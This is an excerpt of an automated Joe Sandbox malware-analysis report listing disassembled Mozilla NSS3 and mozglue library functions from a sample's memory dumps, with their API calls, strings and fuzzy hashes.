                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                                                                                        • String ID: G|l$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 1702738223-4167449071
                                                                                                                                                                                                                                                                                        • Opcode ID: 2f3679500a603b1117d34127790f872038f477b1f7a6d24a9320e1d8c6182a27
                                                                                                                                                                                                                                                                                        • Instruction ID: 9ed49d03d673ca46947eaaf3c96f8595439232678bc12c38bd2d5ee2329635b1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f3679500a603b1117d34127790f872038f477b1f7a6d24a9320e1d8c6182a27
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF6106B0A0024AAFEB109F61CE49BA57BF8EB46708F44C578E9049B641DB719B64CF91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8C4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4C50
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4C5B
                                                                                                                                                                                                                                                                                        • PR_smprintf.NSS3(6C99AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4C76
                                                                                                                                                                                                                                                                                        • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4CAE
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8C4CC9
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8C4CF4
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8C4D0B
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4D5E
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8B4F51,00000000), ref: 6C8C4D68
                                                                                                                                                                                                                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C8C4D85
                                                                                                                                                                                                                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C8C4DA2
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8C4DB9
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8C4DCF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                                                        • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                                                        • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                                                                                        • Opcode ID: 09a8075f2a4d9ae32b278ac17e009d0c9034e5aaa70299f0c274f1740d4139a0
                                                                                                                                                                                                                                                                                        • Instruction ID: 9db9779a80cce071425e569958bd46154cd9b38d3484f3715a0103d037375c28
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09a8075f2a4d9ae32b278ac17e009d0c9034e5aaa70299f0c274f1740d4139a0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD4198B1A001416BEB31AF189D44ABB3A78ABC230DF198534E80A1BB01E735D994C7E3
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8A6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C8A6943
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C8A6957
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C8A6972
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C8A6983
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C8A69AA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C8A69BE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C8A69D2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C8A69DF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C8A6A5B
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8A6D8C
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A6DC5
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6DD6
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6DE7
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8A6E1F
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6E4B
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6E72
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6EA7
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6EC4
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6ED5
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A6EE3
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6EF4
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6F08
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A6F35
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6F44
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6F5B
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A6F65
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C8A781D,00000000,6C89BE2C,?,6C8A6B1D,?,?,?,?,00000000,00000000,6C8A781D), ref: 6C8A6C40
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C8A781D,?,6C89BE2C,?), ref: 6C8A6C58
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C8A781D), ref: 6C8A6C6F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C8A6C84
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C8A6C96
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C8A6CAA
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6F90
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6FC5
                                                                                                                                                                                                                                                                                        • PK11_GetInternalKeySlot.NSS3 ref: 6C8A6FF4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1304971872-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 98534ddf741d60fa03027c7b22feec30de5652bf3b8fd3d0e50de2a11b293aa5
                                                                                                                                                                                                                                                                                        • Instruction ID: c3bcac96dda11efec816f1af5c340ff21029703372b8a95ff09573b23ecf90ae
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98534ddf741d60fa03027c7b22feec30de5652bf3b8fd3d0e50de2a11b293aa5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49B174B1E012099FDF20CBEDDE44B9EBBB4AF09349F240825E815E7644E735E916CB61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8A4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 6C8A4C4C
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C8A4C60
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4CA1
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C8A4CBE
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4CD2
                                                                                                                                                                                                                                                                                        • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4D3A
                                                                                                                                                                                                                                                                                        • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4D4F
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4DB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C7E204A), ref: 6C8507E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,6C7E204A), ref: 6C850864
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C850880
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,6C7E204A), ref: 6C8508CB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(?,?,6C7E204A), ref: 6C8508D7
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(?,?,6C7E204A), ref: 6C8508FB
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 6C8A4DD7
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C8A4DEC
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?), ref: 6C8A4E1B
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C8A4E2F
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4E5A
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C8A4E71
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A4E7A
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?), ref: 6C8A4EA2
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 6C8A4EC1
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C8A4ED6
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?), ref: 6C8A4F01
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A4F2A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 759471828-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2dfb57b41114a9c3fb71c8db71d8fd9e338941c547fc1f1dc90a73d7638e81b4
                                                                                                                                                                                                                                                                                        • Instruction ID: 88f0d22823065f71bfb5d96410ff3f75dbc8494e75d4d8c6534e4399168ceaaf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2dfb57b41114a9c3fb71c8db71d8fd9e338941c547fc1f1dc90a73d7638e81b4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15B13671A04205EFDF10DFA8D944BAA77B4BF89318F145928EC0597B01EB30E966CBE1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C894CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C894CF3
                                                                                                                                                                                                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C894D28
                                                                                                                                                                                                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C894D37
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97D930: PL_strncpyz.NSS3(?,?,?), ref: 6C97D963
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C894D4D
                                                                                                                                                                                                                                                                                        • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C894D7B
                                                                                                                                                                                                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C894D8A
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C894DA0
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C894DBC
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C894E20
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                        • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                                                                                                                                                                                                                        • API String ID: 1003633598-3553622718
                                                                                                                                                                                                                                                                                        • Opcode ID: 8d63d1a350aef5962d941604854685b2d82936b7d8bcbe586391951b0e01dd32
                                                                                                                                                                                                                                                                                        • Instruction ID: 8af0013bf21a2dadd3649e2221f099c82bb045b3e2060fbcce722c3ef37e3995
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d63d1a350aef5962d941604854685b2d82936b7d8bcbe586391951b0e01dd32
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA411A75606104AFD7208F18DE88F6A37B5EBD231EF194824F418A7661D731DA48CB61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C759590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C743217
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C743236
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: FreeLibrary.KERNEL32 ref: 6C74324B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: __Init_thread_footer.LIBCMT ref: 6C743260
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C74327F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C74328E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7432AB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7432D1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7432E5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C7432F7
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C759675
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C759697
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C7596E8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C759707
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C75971F
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C759773
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C7597B7
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C7597D0
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C7597EB
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C759824
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                                                        • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                                                                                        • Opcode ID: 823137802cf1f6069c3b510419eabd6212fef04c80cca69b8adce507b98ffbee
                                                                                                                                                                                                                                                                                        • Instruction ID: 95c7a9b4063f6091fe13eaccf44f6dccdf9d6f49f4d6735dd5686d1425df4e4e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 823137802cf1f6069c3b510419eabd6212fef04c80cca69b8adce507b98ffbee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F061C5B17002069FDF00CF74DA88B9A7BB5EB5A314F908539F91997780DB30EA65CB91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8C6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C991DE0,?), ref: 6C8C6CFE
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8C6D26
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C8C6D70
                                                                                                                                                                                                                                                                                        • PORT_Alloc_Util.NSS3(00000480), ref: 6C8C6D82
                                                                                                                                                                                                                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C8C6DA2
                                                                                                                                                                                                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8C6DD8
                                                                                                                                                                                                                                                                                        • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C8C6E60
                                                                                                                                                                                                                                                                                        • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C8C6F19
                                                                                                                                                                                                                                                                                        • PK11_DigestBegin.NSS3(00000000), ref: 6C8C6F2D
                                                                                                                                                                                                                                                                                        • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C8C6F7B
                                                                                                                                                                                                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C8C7011
                                                                                                                                                                                                                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C8C7033
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8C703F
